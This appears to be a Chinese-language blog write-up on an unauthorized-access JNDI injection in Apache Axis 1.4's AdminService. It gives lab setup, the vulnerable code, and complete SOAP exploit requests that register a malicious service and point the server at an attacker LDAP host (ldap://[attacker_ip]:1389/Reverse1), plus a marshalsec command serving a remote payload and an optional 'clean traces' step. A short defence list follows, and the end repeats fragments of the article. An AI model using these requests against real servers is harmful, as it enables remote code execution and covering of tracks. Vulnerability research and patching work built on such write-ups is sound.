Apache Axis 1.4 AdminService 未授权访问 JNDI 注入漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Apache Axis 1.4 版本中存在一个严重的安全漏洞，当 AdminService 的 `enableRemoteAdmin<\/code> 参数设置为 true 时，攻击者可以利用未授权访问和 JNDI 注入实现远程代码执行。<\/p>`

漏洞前提条件<\/h2>

目标系统运行 Apache Axis 1.4<\/li>
AdminService<\/code> 的 enableRemoteAdmin<\/code> 参数设置为 true<\/li>
目标系统可访问外部网络（用于加载恶意 JNDI 对象）<\/li>
<\/ul>
环境搭建<\/h2>
1. 下载并部署 Axis 1.4<\/h3>
从 Apache 官方镜像下载 Axis 1.4：<\/p>
http:\/\/mirror.navercorp.com\/apache\/axis\/axis\/java\/1.4\/
<\/code><\/pre>
解压后将 webapps\/axis<\/code> 目录复制到 Tomcat 的 webapps<\/code> 目录下。<\/p>
2. 配置环境变量<\/h3>
编辑 ~\/.profile<\/code> 文件，添加以下环境变量：<\/p>
export AXIS_HOME=<\/span>\/var\/lib\/tomcat8\/webapps\/axis
<\/span><\/span>export AXIS_LIB=<\/span>$AXIS_HOME\/WEB-INF\/lib
<\/span><\/span>export AXISCLASSPATH=<\/span>$AXIS_LIB\/axis.jar:$AXIS_LIB\/commons-discovery-0.2.jar:$AXIS_LIB\/commons-logging-1.0.4.jar:$AXIS_LIB\/jaxrpc.jar:$AXIS_LIB\/saaj.jar:$AXIS_LIB\/log4j-1.2.8.jar:$AXIS_LIB\/xml-apis.jar:$AXIS_LIB\/xercesImpl.jar:$AXIS_LIB\/wsdl4j-1.5.1.jar
<\/span><\/span><\/code><\/pre>执行 source ~\/.profile<\/code> 使配置生效。<\/p>
3. 启用 RemoteAdmin 服务<\/h3>
编辑 webapps\/axis\/WEB-INF\/deploy.wsdd<\/code> 文件，确保包含以下内容：<\/p>
<deployment<\/span> xmlns=<\/span>"http:\/\/xml.apache.org\/axis\/wsdd\/"<\/span>
<\/span><\/span>    xmlns:java=<\/span>"http:\/\/xml.apache.org\/axis\/wsdd\/providers\/java"<\/span>><\/span>
<\/span><\/span>  <service<\/span> name=<\/span>"AdminService"<\/span> provider=<\/span>"java:MSG"<\/span>><\/span>
<\/span><\/span>    <parameter<\/span> name=<\/span>"className"<\/span> value=<\/span>"org.apache.axis.utils.Admin"<\/span>\/><\/span>
<\/span><\/span>    <parameter<\/span> name=<\/span>"allowedMethods"<\/span> value=<\/span>"*"<\/span>\/><\/span>
<\/span><\/span>    <parameter<\/span> name=<\/span>"enableRemoteAdmin"<\/span> value=<\/span>"true"<\/span>\/><\/span>
<\/span><\/span>  <\/service><\/span>
<\/span><\/span><\/deployment><\/span>
<\/span><\/span><\/code><\/pre>4. 部署并刷新配置<\/h3>
执行以下命令部署配置：<\/p>
java -cp $AXISCLASSPATH org.apache.axis.client.AdminClient deploy.wsdd
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
漏洞存在于 org.apache.axis.client.ServiceFactory<\/code> 类的 getService<\/code> 方法中，该方法存在 JNDI 注入点：<\/p>
public<\/span> Service getService<\/span>(<\/span>Environment env)<\/span> throws<\/span> ServiceException {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    String jndiName =<\/span> (<\/span>String)<\/span>env.<\/span>get<\/span>(<\/span>"jndiName"<\/span>);<\/span>
<\/span><\/span>    if<\/span> (<\/span>jndiName !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Context ctx =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>            service =<\/span> (<\/span>Service)<\/span>ctx.<\/span>lookup<\/span>(<\/span>jndiName);<\/span> \/\/ JNDI注入点
<\/span><\/span><\/span><\/span>        }<\/span> catch<\/span> (<\/span>NamingException e)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> ServiceException(<\/span>e);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞利用步骤<\/h2>
1. 注册恶意服务<\/h3>
发送以下 SOAP 请求注册一个名为 test1Service<\/code> 的服务：<\/p>
POST<\/span> \/axis\/services\/AdminService HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [target]:8080<\/span>
<\/span><\/span>Content-Type:<\/span> application\/xml<\/span>
<\/span><\/span>SOAPAction:<\/span> something<\/span>
<\/span><\/span>Content-Length:<\/span> 737<\/span>
<\/span><\/span>
<\/span><\/span><?xml version="1.0" encoding="utf-8"?><\/span>
<\/span><\/span><soapenv:Envelope<\/span> xmlns:soapenv=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span> xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema-instance"<\/span> xmlns:api=<\/span>"http:\/\/127.0.0.1\/Integrics\/Enswitch\/API"<\/span> xmlns:xsd=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema"<\/span>><\/span>
<\/span><\/span>  <soapenv:Body><\/span>
<\/span><\/span>    <ns1:deployment<\/span> xmlns:ns1=<\/span>"http:\/\/xml.apache.org\/axis\/wsdd\/"<\/span> xmlns=<\/span>"http:\/\/xml.apache.org\/axis\/wsdd\/"<\/span> xmlns:java=<\/span>"http:\/\/xml.apache.org\/axis\/wsdd\/providers\/java"<\/span>><\/span>
<\/span><\/span>      <ns1:service<\/span> name=<\/span>"test1Service"<\/span> provider=<\/span>"java:RPC"<\/span>><\/span>
<\/span><\/span>        <ns1:parameter<\/span> name=<\/span>"className"<\/span> value=<\/span>"org.apache.axis.client.ServiceFactory"<\/span>\/><\/span>
<\/span><\/span>        <ns1:parameter<\/span> name=<\/span>"allowedMethods"<\/span> value=<\/span>"*"<\/span>\/><\/span>
<\/span><\/span>      <\/ns1:service><\/span>
<\/span><\/span>    <\/ns1:deployment><\/span>
<\/span><\/span>  <\/soapenv:Body><\/span>
<\/span><\/span><\/soapenv:Envelope><\/span>
<\/span><\/span><\/code><\/pre>2. 触发 JNDI 注入<\/h3>
调用刚创建的 test1Service<\/code> 服务，注入恶意的 LDAP URL：<\/p>
POST<\/span> \/axis\/services\/test1Service HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [target]:8080<\/span>
<\/span><\/span>Content-Type:<\/span> text\/xml;charset=UTF-8<\/span>
<\/span><\/span>Content-Length:<\/span> 720<\/span>
<\/span><\/span>
<\/span><\/span><?xml version="1.0" encoding="utf-8"?><\/span>
<\/span><\/span><soapenv:Envelope<\/span> xmlns:soapenv=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span> xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema-instance"<\/span> xmlns:xsd=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema"<\/span> xmlns:buil=<\/span>"http:\/\/build.antlr"<\/span>><\/span>
<\/span><\/span>  <soapenv:Header\/><\/span>
<\/span><\/span>  <soapenv:Body><\/span>
<\/span><\/span>    <buil:getService<\/span> soapenv:encodingStyle=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/"<\/span>><\/span>
<\/span><\/span>      <environment<\/span> xmlns:apachesoap=<\/span>"http:\/\/xml.apache.org\/xml-soap"<\/span> xmlns:soapenc=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/"<\/span> xsi:type=<\/span>"apachesoap:Map"<\/span>><\/span>
<\/span><\/span>        <item><\/span>
<\/span><\/span>          <key<\/span> xsi:type=<\/span>"soapenc:string"<\/span>><\/span>jndiName<\/key><\/span>
<\/span><\/span>          <value<\/span> xsi:type=<\/span>"soapenc:string"<\/span>><\/span>ldap:\/\/[attacker_ip]:1389\/Reverse1<\/value><\/span>
<\/span><\/span>        <\/item><\/span>
<\/span><\/span>      <\/environment><\/span>
<\/span><\/span>    <\/buil:getService><\/span>
<\/span><\/span>  <\/soapenv:Body><\/span>
<\/span><\/span><\/soapenv:Envelope><\/span>
<\/span><\/span><\/code><\/pre>3. 准备 LDAP 服务器<\/h3>
使用 marshalsec 工具搭建恶意的 LDAP 服务器：<\/p>
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http:\/\/[attacker_ip]:8000\/#Exploit"<\/span>
<\/span><\/span><\/code><\/pre>4. 清理痕迹（可选）<\/h3>
使用以下请求卸载创建的服务：<\/p>
POST<\/span> \/axis\/services\/AdminService HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [target]:8080<\/span>
<\/span><\/span>Content-Type:<\/span> application\/xml<\/span>
<\/span><\/span>Content-Length:<\/span> 463<\/span>
<\/span><\/span>
<\/span><\/span><?xml version="1.0" encoding="utf-8"?><\/span>
<\/span><\/span><soapenv:Envelope<\/span> xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema-instance"<\/span>
<\/span><\/span>        xmlns:api=<\/span>"http:\/\/127.0.0.1\/Integrics\/Enswitch\/API"<\/span>
<\/span><\/span>        xmlns:xsd=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema"<\/span>
<\/span><\/span>        xmlns:soapenv=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span>><\/span>
<\/span><\/span>  <soapenv:Body><\/span>
<\/span><\/span><undeployment<\/span> xmlns=<\/span>"http:\/\/xml.apache.org\/axis\/wsdd\/"<\/span>><\/span>
<\/span><\/span> <service<\/span> name=<\/span>"test1Service"<\/span>\/><\/span>
<\/span><\/span><\/undeployment><\/span>
<\/span><\/span>  <\/soapenv:Body><\/span>
<\/span><\/span><\/soapenv:Envelope><\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

将 enableRemoteAdmin<\/code> 参数设置为 false<\/li>
升级到最新版本的 Apache Axis<\/li>
限制对 \/axis\/services\/AdminService<\/code> 的访问<\/li>
配置网络防火墙规则，限制服务器对外部 LDAP 服务的访问<\/li>
<\/ol>
参考链接<\/h2>

Apache Axis 官方安装文档<\/a><\/li>
Apache Axis 1.4 下载地址<\/a><\/li>
<\/ul>

Apache Axis 1.4 AdminService 未授权访问 JNDI 注入漏洞分析与利用<\/h1>

漏洞概述<\/h2> Apache Axis 1.4 版本中存在一个严重的安全漏洞，当 AdminService 的 enableRemoteAdmin<\/code> 参数设置为 true 时，攻击者可以利用未授权访问和 JNDI 注入实现远程代码执行。<\/p>

环境搭建<\/h2>

漏洞利用步骤<\/h2>

参考链接<\/h2> Apache Axis 官方安装文档<\/a><\/li> Apache Axis 1.4 下载地址<\/a><\/li> <\/ul>

漏洞概述<\/h2>
Apache Axis 1.4 版本中存在一个严重的安全漏洞，当 AdminService 的 `enableRemoteAdmin<\/code> 参数设置为 true 时，攻击者可以利用未授权访问和 JNDI 注入实现远程代码执行。<\/p>`

参考链接<\/h2>

Apache Axis 官方安装文档<\/a><\/li>
Apache Axis 1.4 下载地址<\/a><\/li> <\/ul>